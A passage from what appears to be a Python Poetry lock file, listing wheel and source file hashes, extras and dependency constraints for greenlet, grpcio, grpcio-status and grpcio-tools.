"sha256:aa15a2ec737cb609ed48902b45c5e4ff6044feb5dcdfcf6fa8482379190330d7"}, {file = "greenlet-3.0.0-cp310-universal2-macosx_11_0_x86_64.whl", hash = "sha256:7709fd7bb02b31908dc8fd35bfd0a29fc24681d5cc9ac1d64ad07f8d2b7db62f"}, {file = "greenlet-3.0.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:211ef8d174601b80e01436f4e6905aca341b15a566f35a10dd8d1e93f5dbb3b7"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6512592cc49b2c6d9b19fbaa0312124cd4c4c8a90d28473f86f92685cc5fef8e"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:871b0a8835f9e9d461b7fdaa1b57e3492dd45398e87324c047469ce2fc9f516c"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b505fcfc26f4148551826a96f7317e02c400665fa0883fe505d4fcaab1dabfdd"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:123910c58234a8d40eaab595bc56a5ae49bdd90122dde5bdc012c20595a94c14"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:96d9ea57292f636ec851a9bb961a5cc0f9976900e16e5d5647f19aa36ba6366b"}, {file = "greenlet-3.0.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0b72b802496cccbd9b31acea72b6f87e7771ccfd7f7927437d592e5c92ed703c"}, {file = "greenlet-3.0.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:527cd90ba3d8d7ae7dceb06fda619895768a46a1b4e423bdb24c1969823b8362"}, {file = "greenlet-3.0.0-cp311-cp311-win_amd64.whl", hash = "sha256:37f60b3a42d8b5499be910d1267b24355c495064f271cfe74bf28b17b099133c"}, {file = "greenlet-3.0.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:1482fba7fbed96ea7842b5a7fc11d61727e8be75a077e603e8ab49d24e234383"}, {file = "greenlet-3.0.0-cp312-cp312-macosx_13_0_arm64.whl", hash = "sha256:be557119bf467d37a8099d91fbf11b2de5eb1fd5fc5b91598407574848dc910f"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:73b2f1922a39d5d59cc0e597987300df3396b148a9bd10b76a058a2f2772fc04"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d1e22c22f7826096ad503e9bb681b05b8c1f5a8138469b255eb91f26a76634f2"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1d363666acc21d2c204dd8705c0e0457d7b2ee7a76cb16ffc099d6799744ac99"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:334ef6ed8337bd0b58bb0ae4f7f2dcc84c9f116e474bb4ec250a8bb9bd797a66"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6672fdde0fd1a60b44fb1751a7779c6db487e42b0cc65e7caa6aa686874e79fb"}, {file = "greenlet-3.0.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:952256c2bc5b4ee8df8dfc54fc4de330970bf5d79253c863fb5e6761f00dda35"}, {file = "greenlet-3.0.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:269d06fa0f9624455ce08ae0179430eea61085e3cf6457f05982b37fd2cefe17"}, {file = "greenlet-3.0.0-cp312-cp312-win_amd64.whl", hash = "sha256:9adbd8ecf097e34ada8efde9b6fec4dd2a903b1e98037adf72d12993a1c80b51"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c6b5ce7f40f0e2f8b88c28e6691ca6806814157ff05e794cdd161be928550f4c"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ecf94aa539e97a8411b5ea52fc6ccd8371be9550c4041011a091eb8b3ca1d810"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:80dcd3c938cbcac986c5c92779db8e8ce51a89a849c135172c88ecbdc8c056b7"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e52a712c38e5fb4fd68e00dc3caf00b60cb65634d50e32281a9d6431b33b4af1"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:d5539f6da3418c3dc002739cb2bb8d169056aa66e0c83f6bacae0cd3ac26b423"}, {file = "greenlet-3.0.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:343675e0da2f3c69d3fb1e894ba0a1acf58f481f3b9372ce1eb465ef93cf6fed"}, {file = "greenlet-3.0.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:abe1ef3d780de56defd0c77c5ba95e152f4e4c4e12d7e11dd8447d338b85a625"}, {file = "greenlet-3.0.0-cp37-cp37m-win32.whl", hash = "sha256:e693e759e172fa1c2c90d35dea4acbdd1d609b6936115d3739148d5e4cd11947"}, {file = "greenlet-3.0.0-cp37-cp37m-win_amd64.whl", hash = "sha256:bdd696947cd695924aecb3870660b7545a19851f93b9d327ef8236bfc49be705"}, {file = "greenlet-3.0.0-cp37-universal2-macosx_11_0_x86_64.whl", hash = "sha256:cc3e2679ea13b4de79bdc44b25a0c4fcd5e94e21b8f290791744ac42d34a0353"}, {file = "greenlet-3.0.0-cp38-cp38-macosx_11_0_universal2.whl", hash = "sha256:63acdc34c9cde42a6534518e32ce55c30f932b473c62c235a466469a710bfbf9"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a1a6244ff96343e9994e37e5b4839f09a0207d35ef6134dce5c20d260d0302c"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b822fab253ac0f330ee807e7485769e3ac85d5eef827ca224feaaefa462dc0d0"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8060b32d8586e912a7b7dac2d15b28dbbd63a174ab32f5bc6d107a1c4143f40b"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:621fcb346141ae08cb95424ebfc5b014361621b8132c48e538e34c3c93ac7365"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6bb36985f606a7c49916eff74ab99399cdfd09241c375d5a820bb855dfb4af9f"}, {file = "greenlet-3.0.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:10b5582744abd9858947d163843d323d0b67be9432db50f8bf83031032bc218d"}, {file = "greenlet-3.0.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f351479a6914fd81a55c8e68963609f792d9b067fb8a60a042c585a621e0de4f"}, {file = "greenlet-3.0.0-cp38-cp38-win32.whl", hash = "sha256:9de687479faec7db5b198cc365bc34addd256b0028956501f4d4d5e9ca2e240a"}, {file = "greenlet-3.0.0-cp38-cp38-win_amd64.whl", hash = "sha256:3fd2b18432e7298fcbec3d39e1a0aa91ae9ea1c93356ec089421fabc3651572b"}, {file = "greenlet-3.0.0-cp38-universal2-macosx_11_0_x86_64.whl", hash = "sha256:3c0d36f5adc6e6100aedbc976d7428a9f7194ea79911aa4bf471f44ee13a9464"}, {file = "greenlet-3.0.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:4cd83fb8d8e17633ad534d9ac93719ef8937568d730ef07ac3a98cb520fd93e4"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6a5b2d4cdaf1c71057ff823a19d850ed5c6c2d3686cb71f73ae4d6382aaa7a06"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e7dcdfad252f2ca83c685b0fa9fba00e4d8f243b73839229d56ee3d9d219314"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c94e4e924d09b5a3e37b853fe5924a95eac058cb6f6fb437ebb588b7eda79870"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ad6fb737e46b8bd63156b8f59ba6cdef46fe2b7db0c5804388a2d0519b8ddb99"}, {file = "greenlet-3.0.0-cp39-cp39-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:d55db1db455c59b46f794346efce896e754b8942817f46a1bada2d29446e305a"}, {file = "greenlet-3.0.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:56867a3b3cf26dc8a0beecdb4459c59f4c47cdd5424618c08515f682e1d46692"}, {file = "greenlet-3.0.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9a812224a5fb17a538207e8cf8e86f517df2080c8ee0f8c1ed2bdaccd18f38f4"}, {file = "greenlet-3.0.0-cp39-cp39-win32.whl", hash = "sha256:0d3f83ffb18dc57243e0151331e3c383b05e5b6c5029ac29f754745c800f8ed9"}, {file = "greenlet-3.0.0-cp39-cp39-win_amd64.whl", hash = "sha256:831d6f35037cf18ca5e80a737a27d822d87cd922521d18ed3dbc8a6967be50ce"}, {file = "greenlet-3.0.0-cp39-universal2-macosx_11_0_x86_64.whl", hash = "sha256:a048293392d4e058298710a54dfaefcefdf49d287cd33fb1f7d63d55426e4355"}, {file = "greenlet-3.0.0.tar.gz", hash = "sha256:19834e3f91f485442adc1ee440171ec5d9a4840a1f7bd5ed97833544719ce10b"}, ] [package.extras] docs = ["Sphinx"] test = ["objgraph", "psutil"] [[package]] name = "grpcio" version = "1.59.0" description = "HTTP/2-based RPC framework" optional = true python-versions = ">=3.7" files = [ {file = "grpcio-1.59.0-cp310-cp310-linux_armv7l.whl", hash = "sha256:225e5fa61c35eeaebb4e7491cd2d768cd8eb6ed00f2664fa83a58f29418b39fd"}, {file = "grpcio-1.59.0-cp310-cp310-macosx_12_0_universal2.whl", hash = "sha256:b95ec8ecc4f703f5caaa8d96e93e40c7f589bad299a2617bdb8becbcce525539"}, {file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_aarch64.whl", hash = "sha256:1a839ba86764cc48226f50b924216000c79779c563a301586a107bda9cbe9dcf"}, {file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f6cfe44a5d7c7d5f1017a7da1c8160304091ca5dc64a0f85bca0d63008c3137a"}, {file = "grpcio-1.59.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d0fcf53df684fcc0154b1e61f6b4a8c4cf5f49d98a63511e3f30966feff39cd0"}, {file = "grpcio-1.59.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:fa66cac32861500f280bb60fe7d5b3e22d68c51e18e65367e38f8669b78cea3b"}, {file = "grpcio-1.59.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8cd2d38c2d52f607d75a74143113174c36d8a416d9472415eab834f837580cf7"}, {file = "grpcio-1.59.0-cp310-cp310-win32.whl", hash = "sha256:228b91ce454876d7eed74041aff24a8f04c0306b7250a2da99d35dd25e2a1211"}, {file = "grpcio-1.59.0-cp310-cp310-win_amd64.whl", hash = "sha256:ca87ee6183421b7cea3544190061f6c1c3dfc959e0b57a5286b108511fd34ff4"}, {file = "grpcio-1.59.0-cp311-cp311-linux_armv7l.whl", hash = "sha256:c173a87d622ea074ce79be33b952f0b424fa92182063c3bda8625c11d3585d09"}, {file = "grpcio-1.59.0-cp311-cp311-macosx_10_10_universal2.whl", hash = "sha256:ec78aebb9b6771d6a1de7b6ca2f779a2f6113b9108d486e904bde323d51f5589"}, {file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_aarch64.whl", hash = "sha256:0b84445fa94d59e6806c10266b977f92fa997db3585f125d6b751af02ff8b9fe"}, {file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c251d22de8f9f5cca9ee47e4bade7c5c853e6e40743f47f5cc02288ee7a87252"}, {file = "grpcio-1.59.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:956f0b7cb465a65de1bd90d5a7475b4dc55089b25042fe0f6c870707e9aabb1d"}, {file = "grpcio-1.59.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:38da5310ef84e16d638ad89550b5b9424df508fd5c7b968b90eb9629ca9be4b9"}, {file = "grpcio-1.59.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:63982150a7d598281fa1d7ffead6096e543ff8be189d3235dd2b5604f2c553e5"}, {file = "grpcio-1.59.0-cp311-cp311-win32.whl", hash = "sha256:50eff97397e29eeee5df106ea1afce3ee134d567aa2c8e04fabab05c79d791a7"}, {file = "grpcio-1.59.0-cp311-cp311-win_amd64.whl", hash = "sha256:15f03bd714f987d48ae57fe092cf81960ae36da4e520e729392a59a75cda4f29"}, {file = "grpcio-1.59.0-cp312-cp312-linux_armv7l.whl", hash = "sha256:f1feb034321ae2f718172d86b8276c03599846dc7bb1792ae370af02718f91c5"}, {file = "grpcio-1.59.0-cp312-cp312-macosx_10_10_universal2.whl", hash = "sha256:d09bd2a4e9f5a44d36bb8684f284835c14d30c22d8ec92ce796655af12163588"}, {file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_aarch64.whl", hash = "sha256:2f120d27051e4c59db2f267b71b833796770d3ea36ca712befa8c5fff5da6ebd"}, {file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ba0ca727a173ee093f49ead932c051af463258b4b493b956a2c099696f38aa66"}, {file = "grpcio-1.59.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5711c51e204dc52065f4a3327dca46e69636a0b76d3e98c2c28c4ccef9b04c52"}, {file = "grpcio-1.59.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:d74f7d2d7c242a6af9d4d069552ec3669965b74fed6b92946e0e13b4168374f9"}, {file = "grpcio-1.59.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:3859917de234a0a2a52132489c4425a73669de9c458b01c9a83687f1f31b5b10"}, {file = "grpcio-1.59.0-cp312-cp312-win32.whl", hash = "sha256:de2599985b7c1b4ce7526e15c969d66b93687571aa008ca749d6235d056b7205"}, {file = "grpcio-1.59.0-cp312-cp312-win_amd64.whl", hash = "sha256:598f3530231cf10ae03f4ab92d48c3be1fee0c52213a1d5958df1a90957e6a88"}, {file = "grpcio-1.59.0-cp37-cp37m-linux_armv7l.whl", hash = "sha256:b34c7a4c31841a2ea27246a05eed8a80c319bfc0d3e644412ec9ce437105ff6c"}, {file = "grpcio-1.59.0-cp37-cp37m-macosx_10_10_universal2.whl", hash = "sha256:c4dfdb49f4997dc664f30116af2d34751b91aa031f8c8ee251ce4dcfc11277b0"}, {file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_aarch64.whl", hash = "sha256:61bc72a00ecc2b79d9695220b4d02e8ba53b702b42411397e831c9b0589f08a3"}, {file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f367e4b524cb319e50acbdea57bb63c3b717c5d561974ace0b065a648bb3bad3"}, {file = "grpcio-1.59.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:849c47ef42424c86af069a9c5e691a765e304079755d5c29eff511263fad9c2a"}, {file = "grpcio-1.59.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:c0488c2b0528e6072010182075615620071371701733c63ab5be49140ed8f7f0"}, {file = "grpcio-1.59.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:611d9aa0017fa386809bddcb76653a5ab18c264faf4d9ff35cb904d44745f575"}, {file = "grpcio-1.59.0-cp37-cp37m-win_amd64.whl", hash = "sha256:e5378785dce2b91eb2e5b857ec7602305a3b5cf78311767146464bfa365fc897"}, {file = "grpcio-1.59.0-cp38-cp38-linux_armv7l.whl", hash = "sha256:fe976910de34d21057bcb53b2c5e667843588b48bf11339da2a75f5c4c5b4055"}, {file = "grpcio-1.59.0-cp38-cp38-macosx_10_10_universal2.whl", hash = "sha256:c041a91712bf23b2a910f61e16565a05869e505dc5a5c025d429ca6de5de842c"}, {file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_aarch64.whl", hash = "sha256:0ae444221b2c16d8211b55326f8ba173ba8f8c76349bfc1768198ba592b58f74"}, {file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ceb1e68135788c3fce2211de86a7597591f0b9a0d2bb80e8401fd1d915991bac"}, {file = "grpcio-1.59.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c4b1cc3a9dc1924d2eb26eec8792fedd4b3fcd10111e26c1d551f2e4eda79ce"}, {file = "grpcio-1.59.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:871371ce0c0055d3db2a86fdebd1e1d647cf21a8912acc30052660297a5a6901"}, {file = "grpcio-1.59.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:93e9cb546e610829e462147ce724a9cb108e61647a3454500438a6deef610be1"}, {file = "grpcio-1.59.0-cp38-cp38-win32.whl", hash = "sha256:f21917aa50b40842b51aff2de6ebf9e2f6af3fe0971c31960ad6a3a2b24988f4"}, {file = "grpcio-1.59.0-cp38-cp38-win_amd64.whl", hash = "sha256:14890da86a0c0e9dc1ea8e90101d7a3e0e7b1e71f4487fab36e2bfd2ecadd13c"}, {file = "grpcio-1.59.0-cp39-cp39-linux_armv7l.whl", hash = "sha256:34341d9e81a4b669a5f5dca3b2a760b6798e95cdda2b173e65d29d0b16692857"}, {file = "grpcio-1.59.0-cp39-cp39-macosx_10_10_universal2.whl", hash = "sha256:986de4aa75646e963466b386a8c5055c8b23a26a36a6c99052385d6fe8aaf180"}, {file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_aarch64.whl", hash = "sha256:aca8a24fef80bef73f83eb8153f5f5a0134d9539b4c436a716256b311dda90a6"}, {file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:936b2e04663660c600d5173bc2cc84e15adbad9c8f71946eb833b0afc205b996"}, {file = "grpcio-1.59.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc8bf2e7bc725e76c0c11e474634a08c8f24bcf7426c0c6d60c8f9c6e70e4d4a"}, {file = "grpcio-1.59.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:81d86a096ccd24a57fa5772a544c9e566218bc4de49e8c909882dae9d73392df"}, {file = "grpcio-1.59.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:2ea95cd6abbe20138b8df965b4a8674ec312aaef3147c0f46a0bac661f09e8d0"}, {file = "grpcio-1.59.0-cp39-cp39-win32.whl", hash = "sha256:3b8ff795d35a93d1df6531f31c1502673d1cebeeba93d0f9bd74617381507e3f"}, {file = "grpcio-1.59.0-cp39-cp39-win_amd64.whl", hash = "sha256:38823bd088c69f59966f594d087d3a929d1ef310506bee9e3648317660d65b81"}, {file = "grpcio-1.59.0.tar.gz", hash = "sha256:acf70a63cf09dd494000007b798aff88a436e1c03b394995ce450be437b8e54f"}, ] [package.extras] protobuf = ["grpcio-tools (>=1.59.0)"] [[package]] name = "grpcio-status" version = "1.48.2" description = "Status proto mapping for gRPC" optional = true python-versions = ">=3.6" files = [ {file = "grpcio-status-1.48.2.tar.gz", hash = "sha256:53695f45da07437b7c344ee4ef60d370fd2850179f5a28bb26d8e2aa1102ec11"}, {file = "grpcio_status-1.48.2-py3-none-any.whl", hash = "sha256:2c33bbdbe20188b2953f46f31af669263b6ee2a9b2d38fa0d36ee091532e21bf"}, ] [package.dependencies] googleapis-common-protos = ">=1.5.5" grpcio = ">=1.48.2" protobuf = ">=3.12.0" [[package]] name = "grpcio-tools" version = "1.48.2" description = "Protobuf code generator for gRPC" optional = true python-versions = ">=3.6" files = [ {file = "grpcio-tools-1.48.2.tar.gz", hash = "sha256:8902a035708555cddbd61b5467cea127484362decc52de03f061a1a520fe90cd"}, {file = "grpcio_tools-1.48.2-cp310-cp310-linux_armv7l.whl", hash = "sha256:92acc3e10ba2b0dcb90a88ae9fe1cc0ffba6868545207e4ff20ca95284f8e3c9"}, {file = "grpcio_tools-1.48.2-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:e5bb396d63495667d4df42e506eed9d74fc9a51c99c173c04395fe7604c848f1"}, {file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_aarch64.whl", hash = "sha256:84a84d601a238572d049d3108e04fe4c206536e81076d56e623bd525a1b38def"}, {file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:70564521e86a0de35ea9ac6daecff10cb46860aec469af65869974807ce8e98b"}, {file = "grpcio_tools-1.48.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bdbbe63f6190187de5946891941629912ac8196701ed2253fa91624a397822ec"}, {file = "grpcio_tools-1.48.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:ae56f133b05b7e5d780ef7e032dd762adad7f3dc8f64adb43ff5bfabd659f435"}, {file = "grpcio_tools-1.48.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f0feb4f2b777fa6377e977faa89c26359d4f31953de15e035505b92f41aa6906"}, {file = "grpcio_tools-1.48.2-cp310-cp310-win32.whl", hash = "sha256:80f450272316ca0924545f488c8492649ca3aeb7044d4bf59c426dcdee527f7c"}, {file = "grpcio_tools-1.48.2-cp310-cp310-win_amd64.whl", hash = "sha256:21ff50e321736eba22210bf9b94e05391a9ac345f26e7df16333dc75d63e74fb"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-linux_armv7l.whl", hash = "sha256:d598ccde6338b2cfbb3124f34c95f03394209013f9b1ed4a5360a736853b1c27"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-macosx_10_10_x86_64.whl", hash = "sha256:a43d26714933f23de93ea0bf9c86c66a6ede709b8ca32e357f9e2181703e64ae"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_aarch64.whl", hash = "sha256:55fdebc73fb580717656b1bafa4f8eca448726a7aa22726a6c0a7895d2f0f088"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8588819b22d0de3aa1951e1991cc3e4b9aa105eecf6e3e24eb0a2fc8ab958b3e"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9771d4d317dca029dfaca7ec9282d8afe731c18bc536ece37fd39b8a974cc331"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:d886a9e052a038642b3af5d18e6f2085d1656d9788e202dc23258cf3a751e7ca"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:d77e8b1613876e0d8fd17709509d4ceba13492816426bd156f7e88a4c47e7158"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-win32.whl", hash = "sha256:dcaaecdd5e847de5c1d533ea91522bf56c9e6b2dc98cdc0d45f0a1c26e846ea2"}, {file = "grpcio_tools-1.48.2-cp36-cp36m-win_amd64.whl", hash = "sha256:0119aabd9ceedfdf41b56b9fdc8284dd85a7f589d087f2694d743f346a368556"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-linux_armv7l.whl", hash = "sha256:189be2a9b672300ca6845d94016bdacc052fdbe9d1ae9e85344425efae2ff8ef"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-macosx_10_10_x86_64.whl", hash = "sha256:9443f5c30bac449237c3cf99da125f8d6e6c01e17972bc683ee73b75dea95573"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_aarch64.whl", hash = "sha256:e0403e095b343431195db1305248b50019ad55d3dd310254431af87e14ef83a2"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5410d6b601d1404835e34466bd8aee37213489b36ee1aad2276366e265ff29d4"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51be91b7c7056ff9ee48b1eccd4a2840b0126230803a5e09dfc082a5b16a91c1"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:516eedd5eb7af6326050bc2cfceb3a977b9cc1144f283c43cc4956905285c912"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d18599ab572b2f15a8f3db49503272d1bb4fcabb4b4d1214ef03aca1816b20a0"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-win32.whl", hash = "sha256:d18ef2adc05a8ef9e58ac46357f6d4ce7e43e077c7eda0a4425773461f9d0e6e"}, {file = "grpcio_tools-1.48.2-cp37-cp37m-win_amd64.whl", hash = "sha256:6d9753944e5a6b6b78b76ce9d2ae0fe3f748008c1849deb7fadcb64489d6553b"}, {file = "grpcio_tools-1.48.2-cp38-cp38-linux_armv7l.whl", hash = "sha256:3c8749dca04a8d302862ceeb1dfbdd071ee13b281395975f24405a347e5baa57"}, {file = "grpcio_tools-1.48.2-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:7307dd2408b82ea545ae63502ec03036b025f449568556ea9a056e06129a7a4e"}, {file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_aarch64.whl", hash = "sha256:072234859f6069dc43a6be8ad6b7d682f4ba1dc2e2db2ebf5c75f62eee0f6dfb"}, {file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6cc298fbfe584de8876a85355efbcf796dfbcfac5948c9560f5df82e79336e2a"}, {file = "grpcio_tools-1.48.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f75973a42c710999acd419968bc79f00327e03e855bbe82c6529e003e49af660"}, {file = "grpcio_tools-1.48.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:f766050e491d0b3203b6b85638015f543816a2eb7d089fc04e86e00f6de0e31d"}, {file = "grpcio_tools-1.48.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:8e0d74403484eb77e8df2566a64b8b0b484b5c87903678c381634dd72f252d5e"}, {file = "grpcio_tools-1.48.2-cp38-cp38-win32.whl", hash = "sha256:cb75bac0cd43858cb759ef103fe68f8c540cb58b63dda127e710228fec3007b8"}, {file = "grpcio_tools-1.48.2-cp38-cp38-win_amd64.whl", hash = "sha256:cabc8b0905cedbc3b2b7b2856334fa35cce3d4bc79ae241cacd8cca8940a5c85"}, {file = "grpcio_tools-1.48.2-cp39-cp39-linux_armv7l.whl", hash = "sha256:e712a6d00606ad19abdeae852a7e521d6f6d0dcea843708fecf3a38be16a851e"}, {file = "grpcio_tools-1.48.2-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:e7e7668f89fd598c5469bb58e16bfd12b511d9947ccc75aec94da31f62bc3758"}, {file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_aarch64.whl", hash = "sha256:a415fbec67d4ff7efe88794cbe00cf548d0f0a5484cceffe0a0c89d47694c491"}, {file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d96e96ae7361aa51c9cd9c73b677b51f691f98df6086860fcc3c45852d96b0b0"}, {file = "grpcio_tools-1.48.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e20d7885a40e68a2bda92908acbabcdf3c14dd386c3845de73ba139e9df1f132"}, {file = "grpcio_tools-1.48.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:8a5614251c46da07549e24f417cf989710250385e9d80deeafc53a0ee7df6325"}, {file = "grpcio_tools-1.48.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ace0035766fe01a1b096aa050be9f0a9f98402317e7aeff8bfe55349be32a407"}, {file = "grpcio_tools-1.48.2-cp39-cp39-win32.whl", hash = "sha256:4fa4300b1be59b046492ed3c5fdb59760bc6433f44c08f50de900f9552ec7461"}, {file = "grpcio_tools-1.48.2-cp39-cp39-win_amd64.whl", hash = "sha256:0fb6c1c1e56eb26b224adc028a4204b6ad0f8b292efa28067dff273bbc8b27c4"}, ] [package.dependencies] grpcio = ">=1.48.2" protobuf = ">=3.12.0,<4.0dev" setuptools = "*" [[package]] name = 